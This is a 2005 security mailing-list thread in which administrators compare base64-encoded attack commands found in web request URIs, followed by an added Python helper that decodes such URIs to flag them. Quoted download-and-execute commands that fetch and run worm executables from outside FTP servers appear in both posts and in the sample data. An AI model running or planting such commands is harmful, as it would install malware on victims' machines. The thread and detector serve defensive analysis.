[Dshield] Anyone seen wiit.exe?

Gregory Boyce gboyce at badbelly.com
Mon Aug 29 21:41:39 GMT 2005


I was just hit with a similar type of request:

echo open 24.128.83.224 10051>>o&echo h>>o&echo h>>o&echo get 
cool.exe>>o&echo bye>>o&ftp -n -s:o&cool.exe&del o&exit

I connected to the FTP server and grabbed cool.exe.  Submitting it for 
scanning revealed it is Win32.HLLW.ForBot.

Yours might be a different variant, but you should be able to use the same 
method to figure out what it is.

On Mon, 29 Aug 2005, bgreenwood wrote:

>
>
> Over about the past two weeks or so I have noticed the following being 
> base64 encoded in the URI of some incoming requests to my site...
>
> cmd /k echo open 219.95.165.42 17113 > o&echo user 1 1 >> o &echo get 
> wiit.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &wiit.exe
>
> I have seen this activity before but with different filenames being 
> called out.  I don't recall seeing the wiit.exe or know exactly what it 
> is supposed to be doing. Has anyone seen this or know what it is 
> supposed to be doing once executed?
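
An added example, not part of either poster's message: a log-triage helper that decodes base64 tokens in request URIs and reports the FTP server, port and file name when the decoded text matches the echo-script pattern quoted in this thread. The function names, the sample URIs, the address 192.0.2.10 and the file name sample.exe are constructed for illustration.

```python
import base64, binascii, re
from urllib.parse import quote, unquote, urlsplit

B64_TOKEN = re.compile(r"[A-Za-z0-9+/_-]{24,}")
# Patterns drawn from the two commands quoted in this thread.
ECHO_OPEN = re.compile(r"echo\s+open\s+(\d{1,3}(?:\.\d{1,3}){3})\s+(\d+)", re.I)
ECHO_GET = re.compile(r"echo\s+get\s+([^\s>&]+)", re.I)
FTP_SCRIPT = re.compile(r"ftp\s+-n\s+-s:([^\s&]+)", re.I)

def candidate_tokens(uri):
    """Yield URL-decoded path segments and query values from a request URI."""
    parts = urlsplit(uri)
    for segment in parts.path.split("/"):
        yield unquote(segment)
    for pair in parts.query.split("&"):
        name, sep, value = pair.partition("=")
        yield unquote(value if sep else name)

def try_b64(token):
    """Return decoded printable ASCII text, or None if token is not base64."""
    body = token.rstrip("=")
    if not B64_TOKEN.fullmatch(body):
        return None
    body = body.replace("-", "+").replace("_", "/")  # accept URL-safe alphabet
    try:
        raw = base64.b64decode(body + "=" * (-len(body) % 4), validate=True)
    except (binascii.Error, ValueError):
        return None
    text = raw.decode("latin-1")
    return text if all(32 <= ord(c) < 127 for c in text) else None

def inspect_uri(uri):
    """Report the FTP server, port, file and script name hidden in a URI."""
    for token in candidate_tokens(uri):
        text = try_b64(token)
        server = ECHO_OPEN.search(text) if text else None
        script = FTP_SCRIPT.search(text) if text else None
        if server and script:
            fetched = ECHO_GET.search(text)
            return {"server": server.group(1), "port": int(server.group(2)),
                    "file": fetched.group(1) if fetched else None,
                    "script": script.group(1)}
    return None

# Constructed sample input: documentation address and made-up file name.
SAMPLE_CMD = ("cmd /k echo open 192.0.2.10 2121 > o&echo user 1 1 >> o &echo get "
              "sample.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &sample.exe")
_enc = lambda text: base64.b64encode(text.encode()).decode()
SAMPLE_URIS = ["/index.html?page=2",
               "/cgi-bin/app?data=" + quote(_enc(SAMPLE_CMD), safe=""),
               "/img/" + _enc("just a harmless thumbnail identifier")]
```

A base64 value placed in the path that itself contains "/" is split across segments and will be missed by this tokenizer.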

